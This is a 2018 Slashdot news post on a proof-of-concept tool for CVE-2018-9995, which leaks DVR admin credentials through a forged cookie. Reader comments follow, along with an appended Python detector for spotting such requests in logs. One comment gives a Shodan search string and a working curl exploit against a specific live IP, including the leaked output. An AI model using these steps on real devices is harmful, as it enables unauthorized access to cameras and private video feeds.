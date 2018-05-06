

 


New Hacking Tool Lets Users Access a Bunch of DVRs and Their Video Feeds

Posted by BeauHD from the open-sesame dept.
An anonymous reader writes: "An Argentinian security researcher named Ezequiel Fernandez has published a powerful new tool yesterday that can easily extract plaintext credentials for various DVR brands and grant attackers access to those systems, and inherently the video feeds they're supposed to record," reports Bleeping Computer. "The tool, named getDVR_Credentials, is a proof-of-concept for CVE-2018-9995, a vulnerability discovered by Fernandez at the start of last month, [affecting TBK DVR systems]. Fernandez discovered that by accessing the control panel of specific DVRs with a cookie header of 'Cookie: uid=admin,' the DVR would respond with the device's admin credentials in cleartext." Tens of thousands of vulnerable devices available online can be hijacked with their video feeds assembled in voyeur sites, like it's been done in the past.

  • If the tech industry was serious about IOT - tens or hundreds of millions of home devices that are internet connected - they should have gotten together, pooled a few billion dollars of R&D money, and researched ways to make unauthorized access to these IOT products fucking-difficult-to-near-impossible. There are plenty of smart nerds on the market who could actually have pulled this off, given enough funding and other resources. Instead, tens of millions of devices with shoddy security were sold in a worl

  • I would guess such people don't have much to steal.

  • Howto (Score:4, Interesting)

    by Xenolith0 ( 808358 ) on Sunday May 06, 2018 @04:53PM (#56564352) Homepage

    Since the article is light on actual details of how to find vulnerable machines.

    Go to shodan.io [shodan.io] and search for '<A HREF="/login.rsp">'

    Replace the IP 14.63.122.219:9000 in the example with one from Shodan's results.

    $ curl "http://14.63.122.219:9000/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
    {"result":0,"list":[{"uid":"admin","pwd":"","role":2,"enmac":0,"mac":"00:00:00:00:00:00","playback":4294967295,"view":4294967295,"rview":4294967295,"ptz":4294967295,"backup":4294967295,"opt":4294967295}]}
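
For anyone defending a network with one of these DVRs on it, the request and response quoted in the comment above are specific enough to detect. The following is an added example, not part of the original post or of getDVR_Credentials: it flags logged requests to `/device.rsp?opt=user&cmd=list` that carry the `uid=admin` cookie and separates replies that actually contained a user list from ones that did not. The log format, field names and sample records are assumptions constructed for the example.

```python
import json
from http.cookies import SimpleCookie
from urllib.parse import urlsplit, parse_qs

# Constructed records, not real traffic: one JSON object per line, as a proxy or
# sensor in front of a DVR might log them. The field names are assumptions of
# this example; source addresses are from the documentation ranges.
SAMPLE_LOG = r"""
{"src":"198.51.100.7","url":"/device.rsp?opt=user&cmd=list","cookie":"uid=admin","status":200,"body":"{\"result\":0,\"list\":[{\"uid\":\"admin\",\"pwd\":\"\",\"role\":2}]}"}
{"src":"192.0.2.10","url":"/login.rsp","cookie":"","status":200,"body":"<html></html>"}
{"src":"198.51.100.9","url":"/device.rsp?cmd=list&opt=user","cookie":"lang=en; uid=admin","status":404,"body":""}
{"src":"192.0.2.10","url":"/device.rsp?opt=sys&cmd=info","cookie":"uid=admin","status":200,"body":"{\"result\":0}"}
"""

def leaks_credentials(body):
    """True if a response body is a JSON user list carrying uid/pwd pairs."""
    try:
        users = json.loads(body).get("list")
    except (ValueError, AttributeError, TypeError):
        return False
    return isinstance(users, list) and any(
        isinstance(u, dict) and "uid" in u and "pwd" in u for u in users)

def classify(record):
    """Return 'disclosed', 'probe' or None for one logged request/response."""
    url = urlsplit(record["url"])
    query = parse_qs(url.query)
    cookie = SimpleCookie()
    cookie.load(record.get("cookie", ""))
    forged = "uid" in cookie and cookie["uid"].value == "admin"
    user_list = (url.path == "/device.rsp" and query.get("opt") == ["user"]
                 and query.get("cmd") == ["list"])
    if not (forged and user_list):
        return None
    if record.get("status") == 200 and leaks_credentials(record.get("body", "")):
        return "disclosed"   # device answered with the account list
    return "probe"           # request matched, no credentials in the reply

def scan(log_text):
    """Classify every non-empty log line; return [(source, verdict), ...]."""
    records = [json.loads(l) for l in log_text.splitlines() if l.strip()]
    return [(r["src"], v) for r in records if (v := classify(r))]

if __name__ == "__main__":
    for src, verdict in scan(SAMPLE_LOG):
        print(f"{src}\t{verdict}")
```

A "disclosed" verdict means the credentials on that device should be treated as exposed; the page does not say whether legitimate sessions also send this cookie, so triage hits by source address.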

